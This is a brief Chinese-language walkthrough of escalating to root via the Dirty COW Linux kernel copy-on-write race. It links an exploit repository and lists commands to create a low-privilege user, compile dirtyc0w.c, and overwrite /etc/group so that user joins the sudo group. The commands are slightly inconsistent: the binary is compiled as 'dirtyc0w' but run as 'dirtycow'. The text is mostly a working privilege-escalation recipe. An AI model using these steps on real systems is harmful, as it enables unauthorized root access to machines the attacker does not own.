该漏洞是 Linux 内核的内存子系统在处理写时拷贝(Copy-on-Write)时存在条件竞争漏洞, 导致可以
破坏私有只读内存映射。黑客可以在获取低权限的的本地用户后,利用此漏洞获取 其他只读内存映射的
写权限,进一步获取 root 权限
exp下载 https://github.com/Brucetg/DirtyCow-EXP
该漏洞需要攻击者先获取一个低权限的用户,首先新建一个账户yidian 密码123456
将脚本上传到目标吗服务器,gcc编译
gcc -pthread dirtyc0w.c -o dirtyc0w
chmod +x dirtycow
./dirtycow /etc/group "$(sed '/\(sudo*\)/ s/$/,yidian/' /etc/group)"
执行exp
切换到yidian用户由于已经加入sodu组可以直接切换到root权限
